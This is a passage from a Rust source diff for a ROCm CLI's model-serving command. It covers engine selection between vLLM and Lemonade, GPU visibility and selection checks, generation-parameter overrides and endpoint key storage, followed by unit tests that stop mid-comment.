&selected_engine, + engine_recipe, + gpu_memory_utilization, + ); + // Stored without a `note:` prefix so it can feed both output paths: the plan + // path adds the prefix inline, the interactive summary adds it when rendering. + let gpu_memory_utilization_note = (gpu_memory_utilization.is_some() && !engine_serves_vllm) + .then(|| { + format!( + "--gpu-memory-utilization applies only to vLLM; ignored for engine '{selected_engine}'" + ) + }); + // Translate the engine-neutral CLI controls into each adapter's server-wide + // defaults: vLLM generation config or Lemonade llama.cpp launch flags. + let generation_defaults = ServeGenerationDefaults { + temperature, + top_p, + max_tokens, + }; + let engine_recipe = engine_recipe_with_generation_defaults( + &selected_engine, + engine_recipe, + generation_defaults, + )?; + let tool_call_note = if tool_call_parser.is_some() && !engine_serves_vllm { + Some(format!( + "note: --tool-call-parser applies only to vLLM; ignored for engine '{selected_engine}'" + )) + } else if engine_serves_vllm && !engine_recipe_enables_tool_choice(engine_recipe.as_ref()) { + Some( + "note: tool calling is disabled for this model; pass `--tool-call-parser ` (e.g. hermes, llama3_json, mistral) to enable it".to_owned(), + ) + } else { + None + }; + let device_policy = parse_device_policy(device.as_ref().map(|policy| policy.as_policy_str()))?; + let gpu_selection = parse_gpu_selection(gpu.as_deref())?; + // CPU-only serving never pins a GPU, so skip GPU resolution entirely and + // surface the explicit `--gpu` as ignored rather than printing a device the + // server will not use. + let cpu_only = matches!(device_policy, DevicePolicy::CpuOnly); + // AMD GPU ordinals still usable after the active visibility mask + // (`HIP_VISIBLE_DEVICES`, then `ROCR_VISIBLE_DEVICES`) is applied, in HIP + // ordinal space — the space `--gpu` is validated and exported through. A + // `ROCR_VISIBLE_DEVICES` mask hides devices below HIP, which re-indexes the + // survivors as `0..N`, so those HIP positions are what comes back here, not the + // physical ROCR token values. `None` means availability could not be probed + // (a non-Linux target, both KFD and DRM unreadable on Linux, or a mask this + // ordinal-only probe cannot interpret such as one naming UUIDs) — NOT WSL, + // which answers authoritatively via `detect_wsl_summary`. On `None` selection + // stays permissive and defers device validation to the engine. An empty set is + // the authoritative "no usable GPU", not "unknown". Computed once and reused + // for the fail-fast check below and for mask-aware GPU selection, so serve + // never auto-selects — or accepts an explicit `--gpu` for — a hidden device. + let visible_gpu_indices = if cpu_only { + None + } else { + rocm_core::usable_amd_gpu_indices() + }; + // Fail fast under a GPU-required policy when the host has no usable AMD GPU, + // BEFORE preparing or launching any engine (no wasted engine download, and an + // actionable message instead of a late engine crash). The engine enforces the + // same rule as a backstop. Skipped for cpu_only; permissive when availability + // cannot be probed on this platform (probe returns `None`). The E2E-only + // backend-failure scenario bypasses this host precondition so the black-box + // test reaches Lemonade's backend boundary without real GPU hardware. + let scripted_backend_failure = cfg!(feature = "e2e-test-hooks") + && std::env::var_os("ROCM_E2E_LEMONADE_BACKEND_INSTALL_FAILURE").is_some(); + if !cpu_only + && !scripted_backend_failure + && let Some(usable) = visible_gpu_indices.as_deref() + && usable.is_empty() + { + bail!( + "no usable AMD GPU detected; `rocm serve` requires a GPU under the {policy} \ + policy and does not fall back to CPU. Check the driver with `rocm examine`, \ + confirm /dev/kfd is present, and ensure HIP_VISIBLE_DEVICES / \ + ROCR_VISIBLE_DEVICES are not masking every device.", + policy = device_policy_name(&device_policy) + ); + } + // `--gpu` selects by the amd-smi `gpu` ordinal but is exported via + // `HIP_VISIBLE_DEVICES`; those orderings can diverge when + // `ROCR_VISIBLE_DEVICES`/partitioning is in play, so warn at serve time. + let rocr_visible_devices_set = std::env::var_os("ROCR_VISIBLE_DEVICES").is_some(); + // Whether *any* visibility mask is active. The visible set alone cannot say: + // with no mask it is just `0..present`, indistinguishable from a HIP mask + // that happens to list the low ordinals. `validate_pinned_gpu_index` uses + // this only to word its rejection — "under the active visibility mask" when a + // mask is set, "not present on this host" when none is — so an out-of-range + // `--gpu` on an unmasked host is not blamed on a mask the user never set. + let visibility_mask_active = + rocr_visible_devices_set || std::env::var_os("HIP_VISIBLE_DEVICES").is_some(); + let gpu_vram = if cpu_only { None } else { gpu_vram_usage() }; + // Validate an explicit `--gpu ` up front — before engine/runtime + // resolution — so an out-of-range or masked-out ordinal produces a + // GPU-specific refusal even when no ROCm runtime is configured. Otherwise the + // "no active ROCm runtime is configured" bail-out below pre-empts it and the + // user sees a generic runtime error for what is really a bad `--gpu` value. + // This is pure validation (no service-state read), so it needs no lock; + // `--gpu auto` reads live busy-GPU state and stays under `launch_lock` below. + let pinned_gpu_indices = if !cpu_only && let GpuSelection::Index(index) = &gpu_selection { + Some(validate_pinned_gpu_index( + *index, + detect_gpu_count(), + visible_gpu_indices.as_deref(), + visibility_mask_active, + )?) + } else { + None + }; + let resolved_selection = resolve_engine_selection( + &config, + &selected_engine, + runtime_id.as_deref(), + env_id.as_deref(), + ); + let resolved_selection = validate_engine_selection_runtime(&paths, resolved_selection)?; + if !matches!(device_policy, DevicePolicy::CpuOnly) + && resolved_selection.runtime_id.is_none() + && resolved_selection.env_id.is_none() + && !engine_manages_own_runtime(&selected_engine) + { + bail!( + "device_policy: {}; no active ROCm runtime is configured; run `rocm runtimes list` and `rocm runtimes activate `, or pass --runtime-id/--env-id", + device_policy_name(&device_policy) + ); + } + if !matches!(device_policy, DevicePolicy::CpuOnly) + && engine_manages_own_runtime(&selected_engine) + { + ensure_self_managed_engine_ready(&paths, &mut config, &selected_engine)?; + } + let resolve = engine_request::<_, ResolveModelResponse>( + Some(&paths), + &selected_engine, + EngineMethod::ResolveModel, + &ResolveModelRequest { + model_ref: engine_model_ref, + runtime_id: resolved_selection.runtime_id.clone(), + device_policy: Some(device_policy), + recipe_override: None, + engine_recipe, + }, + )?; + // Serialize GPU auto-selection with the managed-service claim: the busy-GPU + // read and the claiming record write inside `spawn_managed_engine_child` must + // be atomic, or two concurrent `rocm serve --gpu auto` can both read the same + // GPU as free and launch on it. Taken here — after engine resolution, + // self-managed runtime prep, and the `ResolveModel` RPC have all completed + // unlocked — so a slow first-use install (e.g. the Lemonade embeddable + // download/extract) never blocks an unrelated serve. + let (gpu_indices, launch_lock) = select_gpu_indices_under_launch_lock( + &paths, + cpu_only, + pinned_gpu_indices, + detect_gpu_count, + visible_gpu_indices.as_deref(), + gpu_vram.as_deref(), + )?; + let service_id = generate_service_id(&selected_engine, &resolve.canonical_model_id); + + // Attached foreground streaming is the debugging path, selected by `--verbose` + // or `--foreground`. Everything else backgrounds the server and, when writing + // to an interactive terminal, shows a progress spinner + deployment summary + // instead of a raw log stream. Piped/captured output (CI, the chat assistant) + // keeps the plain line-by-line form. + let use_foreground = foreground || verbose; + let background = !use_foreground; + let summary_mode = background && std::io::IsTerminal::is_terminal(&std::io::stdout()); + + if !summary_mode { + println!("serve plan"); + println!(" requested model: {model}"); + println!(" resolved model: {}", resolve.canonical_model_id); + println!(" engine: {selected_engine}"); + println!("{}", serve_engine_selection_line(&serve_engine)); + println!(" host: {host}"); + println!(" port: {port}"); + if let Some(runtime_id) = resolved_selection.runtime_id.as_deref() { + println!(" runtime_id: {runtime_id}"); + } + if let Some(env_id) = resolved_selection.env_id.as_deref() { + println!(" env_id: {env_id}"); + } + if let Some(source) = resolved_selection.source.as_deref() { + println!(" selection_source: {source}"); + } + println!( + " device_policy: {}", + device_policy_name(&resolve.device_policy) + ); + if cpu_only { + if matches!(gpu_selection, GpuSelection::Index(_)) { + println!( + " warning: --gpu was ignored because --device cpu_only runs the model on CPU" + ); + } + } else { + match &gpu_selection { + GpuSelection::Auto => { + let csv = rocm_engine_protocol::gpu_indices_to_csv(&gpu_indices) + .unwrap_or_else(|| "none".to_owned()); + println!(" gpu: auto (selected {csv})"); + } + GpuSelection::Index(_) => { + let csv = rocm_engine_protocol::gpu_indices_to_csv(&gpu_indices) + .unwrap_or_else(|| "none".to_owned()); + println!(" gpu: {csv}"); + } + } + if rocr_visible_devices_set { + println!( + " warning: ROCR_VISIBLE_DEVICES is set; the selected amd-smi ordinal is exported \ + via HIP_VISIBLE_DEVICES, which the runtime interprets relative to the \ + ROCR-visible set, so the device the engine binds may differ. Verify the \ + selected GPU or unset ROCR_VISIBLE_DEVICES." + ); + } + if let Some(warning) = serve_gpu_low_memory_warning( + &gpu_indices, + gpu_vram.as_deref(), + host_gpu_summary.as_ref(), + ) { + println!(" {warning}"); + if engine_serves_vllm { + println!(" note: {}", rocm_core::VLLM_GPU_MEMORY_UTILIZATION_HINT); + } + } + } + if let Some(engine_recipe) = &resolve.engine_recipe { + print!("{}", render_serve_engine_recipe_lines(engine_recipe)); + } + if let Some(note) = &tool_call_note { + println!(" {note}"); + } + if let Some(note) = &gpu_memory_utilization_note { + println!(" note: {note}"); + } + } + + let managed_runtime_id = resolved_selection.runtime_id.clone(); + let managed_env_id = resolved_selection.env_id.clone(); + + // Persist the endpoint key (public bind only) in a 0600 file so the engine + // child, the restart/recovery path, and inspection commands can retrieve it by + // service id. Loopback binds resolve to `None` and store nothing. + if let Some(key) = endpoint_auth.as_deref() { + endpoint_keys::store_endpoint_api_key(&paths, &service_id, key)?; + } + + if background { + let mut spinner = + cli_progress::Spinner::new(format!("Starting {model} on {selected_engine}…")); + spinner.tick(); + let report = start_managed_service( + &selected_engine, + &service_id, + &model, + &resolve, + &host, + port, + &resolve.device_policy, + &gpu_indices, + managed_runtime_id.as_deref(), + managed_env_id.as_deref(), + resolve.engine_recipe.as_ref(), + endpoint_auth.as_deref(), + launch_lock, + require_api_key, + &mut |_elapsed| spinner.tick(), + )?; + ensure_background_helper_running_quiet(summary_mode)?; + + // An equivalent service was already running, so nothing was spawned and the + // freshly generated key is unused — drop it rather than leave it orphaned in + // storage. The existing service keeps its own key. + if report.already_running { + drop_orphaned_endpoint_key_on_already_running( + &paths, + &service_id, + endpoint_auth.as_deref(), + ); + } + // Safe to move `endpoint_auth` here: this branch always returns, so the + // fall-through (attached) path below never observes it moved. + let launched_key = if report.already_running { + None + } else { + endpoint_auth + }; + + if summary_mode { + // Best-effort inference smoke test, on by default (opt out with + // `--no-smoke-test`). Only meaningful for a freshly-ready server we + // just launched; skipped when metrics could not be shown anyway. + let metrics = if !no_smoke_test && !report.already_running && report.status == "ready" { + spinner.set_label("Running smoke test…"); + // The local provider resolves the endpoint key from the per-service + // 0600 key file by service id, so the smoke test authenticates + // against a protected public endpoint without threading the secret + // through here. + serve_summary::run_smoke_test(&paths, &resolve.canonical_model_id) + } else { + serve_summary::SmokeMetrics::default() + }; + spinner.clear(); + + let notes = collect_serve_notes( + cpu_only, + &gpu_selection, + rocr_visible_devices_set, + &gpu_indices, + gpu_vram.as_deref(), + gpu_memory_utilization_note.as_deref(), + host_gpu_summary.as_ref(), + engine_serves_vllm, + ); + let summary = serve_summary::DeploymentSummary { + engine: selected_engine.clone(), + requested_model: model, + api_model: resolve.canonical_model_id, + chat_endpoint: format!("{}/chat/completions", report.endpoint_url), + service_id: report.service_id.clone(), + status: report.status.clone(), + already_running: report.already_running, + metrics, + api_key: launched_key, + notes, + }; + // Same intentional one-time key display as `print_managed_launch_plain` + // in main.rs; see its rationale for why the tag below is currently inert. + // codeql[rust/cleartext-logging] + print!("{}", serve_summary::render_summary(&summary)); + } else { + spinner.clear(); + print_managed_launch_plain(&report, launched_key.as_deref()); + } + return Ok(()); + } + + run_attached_service( + &selected_engine, + &service_id, + &model, + &resolve, + &host, + port, + &gpu_indices, + resolved_selection.runtime_id.as_deref(), + resolved_selection.env_id.as_deref(), + endpoint_auth.as_deref(), + launch_lock, + require_api_key, + ) +} + +#[cfg(test)] +mod tests { + use std::collections::BTreeMap; + use std::fs; + use std::time::Duration; + + use super::*; + use rocm_core::{ManagedServiceRecord, resolve_builtin_model_recipe}; + + use crate::tests::test_paths; + + /// Persist a live-looking managed record claiming `gpu` — the same shape a + /// real launch writes, with the current process id as the supervisor so the + /// liveness refresh in `load_managed_services` keeps it "starting" (and thus + /// counted by `busy_gpu_indices`). + fn write_claiming_record(paths: &AppPaths, service_id: &str, port: u16, gpu: &[u32]) { + let mut record = ManagedServiceRecord::new( + paths, + service_id, + "vllm", + "qwen", + "Qwen/Qwen3.5", + "127.0.0.1", + port, + "managed", + std::process::id(), + Some("therock-release".to_owned()), + None, + Some("gpu_required".to_owned()), + ); + record.status = "starting".to_owned(); + record.gpu_indices = gpu.to_vec(); + record.write().expect("write claiming record"); + } + + #[test] + fn serve_engine_selection_uses_shared_recipe_when_no_override_exists() { + let recipe = resolve_builtin_model_recipe("qwen32b").expect("qwen32b recipe"); + + let selection = select_serve_engine(None, None, Some(&recipe), None); + + assert_eq!( + selection, + ServeEngineSelection { + engine: "vllm".to_owned(), + source: "recipe preferred engine; pass --engine to override; no automatic fallback", + } + ); + assert_eq!( + serve_engine_selection_line(&selection), + " engine_selection: recipe preferred engine; pass --engine to override; no automatic fallback" + ); + assert_eq!( + serve_model_ref_for_engine("qwen32b", Some(&recipe), "vllm"), + "Qwen/Qwen3-32B-FP8" + ); + } + + #[test] + fn serve_engine_selection_prefers_vllm_for_supported_gpus() { + let summary = rocm_core::HostGpuSummary { + therock_family: Some("gfx90a".to_owned()), + ..rocm_core::HostGpuSummary::default() + }; + + let selection = select_serve_engine(None, None, None, Some(&summary)); + + // vLLM is unsupported on native Windows, so the GPU-family preference is gated + // off there and selection falls back to the platform default. + let expected = if cfg!(windows) { + ServeEngineSelection { + engine: "lemonade".to_owned(), + source: "platform default", + } + } else { + ServeEngineSelection { + engine: "vllm".to_owned(), + source: "detected ROCm GPU family prefers vLLM", + } + }; + assert_eq!(selection, expected); + } + + #[test] + fn serve_engine_selection_keeps_recipe_engine_when_gpu_preference_is_incompatible() { + // qwen-smoke is a tiny GGUF model that only Lemonade can serve and has no vLLM + // recipe. Even on a vLLM-preferred GPU it must stay on Lemonade rather than being + // forced onto vLLM (which cannot load the GGUF and fails to locate the model). + let recipe = resolve_builtin_model_recipe("qwen-smoke").expect("qwen-smoke recipe"); + let summary = rocm_core::HostGpuSummary { + therock_family: Some("gfx90a".to_owned()), + ..rocm_core::HostGpuSummary::default() + }; + + let selection = select_serve_engine(None, None, Some(&recipe), Some(&summary)); + + assert_eq!( + selection, + ServeEngineSelection { + engine: "lemonade".to_owned(), + source: "recipe preferred engine; pass --engine to override; no automatic fallback", + } + ); + } + + #[test] + fn serve_qwen_uses_vllm_with_hf_repo_on_vllm_preferred_gpu() { + // The qwen alias serves the GGUF via Lemonade by default, but on a vLLM-preferred + // GPU it must serve the non-GGUF Hugging Face repo through vLLM. + let recipe = resolve_builtin_model_recipe("qwen").expect("qwen recipe"); + let summary = rocm_core::HostGpuSummary { + therock_family: Some("gfx94X-dcgpu".to_owned()), + ..rocm_core::HostGpuSummary::default() + }; + + let selection = select_serve_engine(None, None, Some(&recipe), Some(&summary)); + // On native Windows the vLLM preference is gated off, so the qwen recipe stays on + // its own preferred engine (Lemonade) instead of being routed to vLLM. + let expected = if cfg!(windows) { + ServeEngineSelection { + engine: "lemonade".to_owned(), + source: "recipe preferred engine; pass --engine to override; no automatic fallback", + } + } else { + ServeEngineSelection { + engine: "vllm".to_owned(), + source: "detected ROCm GPU family prefers vLLM", + } + }; + assert_eq!(selection, expected); + assert_eq!( + serve_model_ref_for_engine("qwen", Some(&recipe), "vllm"), + "Qwen/Qwen3-4B-Instruct-2507" + ); + // Lemonade keeps the GGUF canonical id. + assert_eq!( + serve_model_ref_for_engine("qwen", Some(&recipe), "lemonade"), + "Qwen3-4B-Instruct-2507-GGUF" + ); + } + + #[test] + fn explicit_engine_override_keeps_alias_when_shared_recipe_is_for_another_engine() { + // `qwen-smoke` is a Lemonade-only GGUF recipe (no vLLM engine recipe). + let recipe = resolve_builtin_model_recipe("qwen-smoke").expect("qwen-smoke recipe"); + + // Served under the engine it targets, the alias resolves to the canonical id. + assert_eq!( + serve_model_ref_for_engine("qwen-smoke", Some(&recipe), "lemonade"), + "Qwen3-0.6B-GGUF" + ); + // Under an engine the recipe does not support, the raw alias flows through unchanged. + assert_eq!( + serve_model_ref_for_engine("qwen-smoke", Some(&recipe), "vllm"), + "qwen-smoke" + ); + } + + #[test] + fn serve_engine_selection_respects_explicit_and_configured_engines() { + let recipe = resolve_builtin_model_recipe("qwen32b").expect("qwen32b recipe"); + + let explicit = select_serve_engine(Some("vllm"), Some("lemonade"), Some(&recipe), None); + let configured = select_serve_engine(None, Some("lemonade"), Some(&recipe), None); + + assert_eq!( + explicit, + ServeEngineSelection { + engine: "vllm".to_owned(), + source: "explicit --engine", + } + ); + assert_eq!( + configured, + ServeEngineSelection { + engine: "lemonade".to_owned(), + source: "configured default_engine", + } + ); + } + + #[test] + fn protocol_engine_recipe_hint_maps_selected_engine_metadata() { + let mut recipe = resolve_builtin_model_recipe("qwen").expect("qwen recipe"); + recipe.engine_recipes = vec![ + rocm_core::ModelRecipeEngineRecord { + engine: "vllm".to_owned(), + required_flags: vec!["--enable-auto-tool-choice".to_owned()], + parser_settings: BTreeMap::from([( + "reasoning_parser".to_owned(), + "qwen3".to_owned(), + )]), + preferred_endpoint: Some(rocm_core::ModelRecipeEndpointRecord { + endpoint_mode: "openai".to_owned(), + settings: BTreeMap::from([("streaming".to_owned(), "true".to_owned())]), + }), + unsupported_combinations: vec![ + rocm_core::ModelRecipeUnsupportedCombinationRecord { + combination: "native Windows GPU serving".to_owned(), + reason: "vLLM ROCm serving is Linux/WSL only".to_owned(), + }, + ], + notes: vec!["adapter hint".to_owned()], + model_id_override: None, + }, + rocm_core::ModelRecipeEngineRecord { + engine: "lemonade".to_owned(), + required_flags: vec!["--reasoning-parser".to_owned(), "qwen3".to_owned()], + parser_settings: BTreeMap::new(), + preferred_endpoint: None, + unsupported_combinations: Vec::new(), + notes: Vec::new(), + model_id_override: None, + }, + ]; + + let hint = protocol_engine_recipe_hint(&recipe, "vllm").expect("vllm hint"); + + assert_eq!(hint.contract_version, ENGINE_RECIPE_CONTRACT_VERSION); + assert_eq!(hint.engine, "vllm"); + assert_eq!( + hint.required_flags, + vec!["--enable-auto-tool-choice".to_owned()] + ); + assert_eq!( + hint.parser_settings + .get("reasoning_parser") + .map(String::as_str), + Some("qwen3") + ); + assert_eq!( + hint.preferred_endpoint + .as_ref() + .map(|endpoint| endpoint.endpoint_mode.as_str()), + Some("openai") + ); + assert_eq!( + hint.preferred_endpoint + .as_ref() + .and_then(|endpoint| endpoint.settings.get("streaming")) + .map(String::as_str), + Some("true") + ); + assert_eq!(hint.unsupported_combinations.len(), 1); + assert_eq!(hint.notes, vec!["adapter hint".to_owned()]); + let serve_lines = render_serve_engine_recipe_lines(&hint); + assert!(serve_lines.contains( + "engine_recipe_policy: selected-engine required_flags are applied at launch" + )); + assert!(serve_lines.contains("engine_recipe_required_flags: --enable-auto-tool-choice")); + assert!(protocol_engine_recipe_hint(&recipe, "unknown-engine").is_none()); + } + + #[test] + fn tool_call_override_synthesizes_hint_for_vllm_without_recipe() { + // Arbitrary HF repo with no catalog recipe: the explicit override is the + // only source of the parser, and a minimal hint is synthesized to carry it. + let hint = engine_recipe_with_tool_call_override("vllm", None, Some("hermes")) + .expect("an override should synthesize a vllm tool-choice hint"); + assert_eq!(hint.engine, "vllm"); + assert_eq!(hint.contract_version, ENGINE_RECIPE_CONTRACT_VERSION); + assert_eq!( + hint.required_flags, + vec![ + "--enable-auto-tool-choice".to_owned(), + "--tool-call-parser".to_owned(), + "hermes".to_owned(), + ] + ); + } + + #[test] + fn tool_call_override_replaces_recipe_authored_parser() { + // Override wins over an authored parser: exactly one `--tool-call-parser`, + // set to the override value, with unrelated flags preserved in order. + let existing = EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: "vllm".to_owned(), + required_flags: vec![ + "--reasoning-parser".to_owned(), + "qwen3".to_owned(), + "--enable-auto-tool-choice".to_owned(), + "--tool-call-parser".to_owned(), + "llama3_json".to_owned(), + ], + ..EngineRecipeHint::default() + }; + let hint = + engine_recipe_with_tool_call_override("vllm", Some(existing), Some("hermes")).unwrap(); + assert_eq!( + hint.required_flags, + vec![ + "--reasoning-parser".to_owned(), + "qwen3".to_owned(), + "--enable-auto-tool-choice".to_owned(), + "--tool-call-parser".to_owned(), + "hermes".to_owned(), + ] + ); + assert_eq!( + hint.required_flags + .iter() + .filter(|flag| *flag == "--tool-call-parser") + .count(), + 1 + ); + } + + #[test] + fn tool_call_override_absent_preserves_recipe_flags_without_guessing() { + // No override: authored recipe metadata flows through unchanged and no + // parser is ever guessed from the model ref. + let authored = EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: "vllm".to_owned(), + required_flags: vec![ + "--enable-auto-tool-choice".to_owned(), + "--tool-call-parser".to_owned(), + "hermes".to_owned(), + ], + ..EngineRecipeHint::default() + }; + let hint = + engine_recipe_with_tool_call_override("vllm", Some(authored.clone()), None).unwrap(); + assert_eq!(hint.required_flags, authored.required_flags); + + // Unknown model, no recipe, no override: nothing is injected. + assert!(engine_recipe_with_tool_call_override("vllm", None, None).is_none()); + // A blank override is treated as absent. + assert!(engine_recipe_with_tool_call_override("vllm", None, Some(" ")).is_none()); + } + + #[test] + fn tool_call_override_leaves_non_vllm_engines_untouched() { + // The override is vLLM-specific: other engines are never rewritten. + assert!(engine_recipe_with_tool_call_override("lemonade", None, Some("hermes")).is_none()); + let existing = EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: "lemonade".to_owned(), + required_flags: vec!["--some-flag".to_owned()], + ..EngineRecipeHint::default() + }; + let hint = engine_recipe_with_tool_call_override( + "lemonade", + Some(existing.clone()), + Some("hermes"), + ) + .unwrap(); + assert_eq!(hint.required_flags, existing.required_flags); + } + + #[test] + fn gpu_memory_utilization_absent_without_explicit_flag() { + // rocm-cli ships no default: with nothing supplied the recipe is left + // alone, so vLLM applies its own default rather than one rocm-cli owns. + assert_eq!(parse_gpu_memory_utilization(None).unwrap(), None); + assert!(engine_recipe_with_gpu_memory_utilization_override("vllm", None, None).is_none()); + let authored = EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: "vllm".to_owned(), + required_flags: vec!["--enable-auto-tool-choice".to_owned()], + ..EngineRecipeHint::default() + }; + let hint = engine_recipe_with_gpu_memory_utilization_override("vllm", Some(authored), None) + .unwrap(); + assert!( + !hint + .required_flags + .iter() + .any(|flag| flag == "--gpu-memory-utilization"), + "no default may be injected: {:?}", + hint.required_flags + ); + } + + #[test] + fn gpu_memory_utilization_override_reaches_required_flags() { + let value = parse_gpu_memory_utilization(Some("0.35")).unwrap(); + let hint = engine_recipe_with_gpu_memory_utilization_override("vllm", None, value) + .expect("an explicit value should synthesize a vllm hint"); + assert_eq!(hint.engine, "vllm"); + assert_eq!(hint.contract_version, ENGINE_RECIPE_CONTRACT_VERSION); + assert_eq!( + hint.required_flags, + vec!["--gpu-memory-utilization".to_owned(), "0.35".to_owned()] + ); + } + + #[test] + fn gpu_memory_utilization_override_replaces_authored_value_and_keeps_others() { + let existing = EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: "vllm".to_owned(), + required_flags: vec![ + "--enable-auto-tool-choice".to_owned(), + "--gpu-memory-utilization".to_owned(), + "0.8".to_owned(), + "--tool-call-parser".to_owned(), + "hermes".to_owned(), + ], + ..EngineRecipeHint::default() + }; + let hint = engine_recipe_with_gpu_memory_utilization_override( + "vllm", + Some(existing), + parse_gpu_memory_utilization(Some("1.0")).unwrap(), + ) + .unwrap(); + assert_eq!( + hint.required_flags, + vec![ + "--enable-auto-tool-choice".to_owned(), + "--tool-call-parser".to_owned(), + "hermes".to_owned(), + "--gpu-memory-utilization".to_owned(), + "1".to_owned(), + ] + ); + } + + #[test] + fn gpu_memory_utilization_override_leaves_non_vllm_engines_untouched() { + // The override is vLLM-specific: other engines are never rewritten, with + // or without a recipe of their own. + assert!( + engine_recipe_with_gpu_memory_utilization_override("lemonade", None, Some(0.5)) + .is_none() + ); + let existing = EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: "lemonade".to_owned(), + required_flags: vec!["--some-flag".to_owned()], + ..EngineRecipeHint::default() + }; + let hint = engine_recipe_with_gpu_memory_utilization_override( + "lemonade", + Some(existing.clone()), + Some(0.5), + ) + .unwrap(); + assert_eq!(hint.required_flags, existing.required_flags); + } + + #[test] + fn gpu_memory_utilization_rejects_out_of_range_and_unparsable_values() { + // An explicit CLI value is never silently ignored (unlike the env-var + // overrides elsewhere): each bad value must produce an actionable error. + for bad in ["0", "0.0", "1.5", "-0.2", "abc", "", "NaN", "inf"] { + let Err(error) = parse_gpu_memory_utilization(Some(bad)) else { + panic!("`{bad}` must be rejected, not silently ignored"); + }; + let message = error.to_string(); + assert!( + message.contains("--gpu-memory-utilization"), + "error for `{bad}` should name the flag: {message}" + ); + } + assert_eq!( + parse_gpu_memory_utilization(Some(" 0.5 ")).unwrap(), + Some(0.5) + ); + assert_eq!(parse_gpu_memory_utilization(Some("1")).unwrap(), Some(1.0)); + } + + #[test] + fn generation_defaults_inject_override_generation_config_for_vllm() { + // vLLM has no raw sampling flags: all three controls collapse into a single + // `--override-generation-config` JSON with `--max-tokens` mapped to the + // engine's `max_new_tokens` output cap. + let hint = engine_recipe_with_generation_defaults( + "vllm", + None, + ServeGenerationDefaults { + temperature: Some(0.5), + top_p: Some(0.25), + max_tokens: Some(128), + }, + ) + .expect("vllm defaults are supported") + .expect("supplied defaults should synthesize a vllm hint"); + assert_eq!(hint.engine, "vllm"); + assert_eq!(hint.required_flags.len(), 2); + assert_eq!(hint.required_flags[0], "--override-generation-config"); + let config: serde_json::Value = + serde_json::from_str(&hint.required_flags[1]).expect("config is valid JSON"); + assert_eq!(config["temperature"], 0.5); + assert_eq!(config["top_p"], 0.25); + assert_eq!(config["max_new_tokens"], 128); + } + + #[test] + fn generation_defaults_include_only_supplied_values() { + // Unset controls are omitted so the engine keeps its own defaults. + let hint = engine_recipe_with_generation_defaults( + "vllm", + None, + ServeGenerationDefaults { + temperature: Some(0.25), + top_p: None, + max_tokens: None, + }, + ) + .expect("vllm defaults are supported") + .expect("a single supplied default still synthesizes a hint"); + let config: serde_json::Value = + serde_json::from_str(&hint.required_flags[1]).expect("config is valid JSON"); + assert_eq!(config["temperature"], 0.25); + assert!(config.get("top_p").is_none()); + assert!(config.get("max_new_tokens").is_none()); + } + + #[test] + fn generation_defaults_merge_with_recipe_authored_config() { + // CLI values win, but authored keys the CLI does not set are preserved and + // exactly one `--override-generation-config` pair remains. + let authored = EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: "vllm".to_owned(), + required_flags: vec![ + "--enable-auto-tool-choice".to_owned(), + "--override-generation-config".to_owned(), + "{\"temperature\":0.9,\"repetition_penalty\":1.1}".to_owned(), + ], + ..EngineRecipeHint::default() + }; + let hint = engine_recipe_with_generation_defaults( + "vllm", + Some(authored), + ServeGenerationDefaults { + temperature: Some(0.25), + top_p: Some(0.5), + max_tokens: None, + }, + ) + .expect("vllm defaults are supported") + .unwrap(); + assert_eq!( + hint.required_flags + .iter() + .filter(|flag| *flag == "--override-generation-config") + .count(), + 1 + ); + assert_eq!(hint.required_flags[0], "--enable-auto-tool-choice"); + let config: serde_json::Value = + serde_json::from_str(hint.required_flags.last().unwrap()).unwrap(); + assert_eq!(config["temperature"], 0.25); + assert_eq!(config["top_p"], 0.5); + assert_eq!(config["repetition_penalty"], 1.1); + } + + #[test] + fn generation_defaults_absent_or_non_vllm_pass_through() { + // No controls supplied: the hint flows through unchanged. + assert!( + engine_recipe_with_generation_defaults( + "vllm", + None, + ServeGenerationDefaults::default() + ) + .unwrap() + .is_none() + ); + assert!( + engine_recipe_with_generation_defaults( + "unknown", + None, + ServeGenerationDefaults { + temperature: Some(0.5), + top_p: Some(0.5), + max_tokens: Some(64), + }, + ) + .is_err() + ); + } + + #[test] + fn generation_defaults_translate_to_lemonade_llama_server_flags() { + let hint = engine_recipe_with_generation_defaults( + "lemonade", + None, + ServeGenerationDefaults { + temperature: Some(0.5), + top_p: Some(0.25), + max_tokens: Some(128), + }, + ) + .expect("lemonade defaults are supported") + .expect("defaults synthesize a recipe"); + assert_eq!( + hint.required_flags, + [ + "--temperature", + "0.5", + "--top-p", + "0.25", + "--n-predict", + "128" + ] + ); + } + + #[test] + fn generation_defaults_preserve_unset_lemonade_recipe_flags() { + // Only --temperature is supplied via CLI; an authored --top-p already + // present in the recipe must survive untouched, mirroring the vLLM + // merge behavior instead of being deleted. + let authored = EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: "lemonade".to_owned(), + required_flags: vec!["--top-p".to_owned(), "0.9".to_owned()], + ..EngineRecipeHint::default() + }; + let hint = engine_recipe_with_generation_defaults( + "lemonade", + Some(authored), + ServeGenerationDefaults { + temperature: Some(0.5), + top_p: None, + max_tokens: None, + }, + ) + .expect("lemonade defaults are supported") + .expect("supplied defaults should synthesize a hint"); + assert_eq!( + hint.required_flags, + ["--top-p", "0.9", "--temperature", "0.5"] + ); + } + + #[test] + fn engine_recipe_enables_tool_choice_reflects_flags() { + assert!(!engine_recipe_enables_tool_choice(None)); + let without = EngineRecipeHint { + contract_version: ENGINE_RECIPE_CONTRACT_VERSION.to_owned(), + engine: "vllm".to_owned(), + required_flags: vec!["--reasoning-parser".to_owned(), "qwen3".to_owned()], + ..EngineRecipeHint::default() + }; + assert!(!engine_recipe_enables_tool_choice(Some(&without))); + let with = engine_recipe_with_tool_call_override("vllm", None, Some("hermes")); + assert!(engine_recipe_enables_tool_choice(with.as_ref())); + } + + #[test] + fn launch_lock_makes_gpu_select_and_claim_atomic() { + // Regression for the serve read-select-launch race: the busy-GPU read and + // the claiming record write must happen under one lock, or two concurrent + // 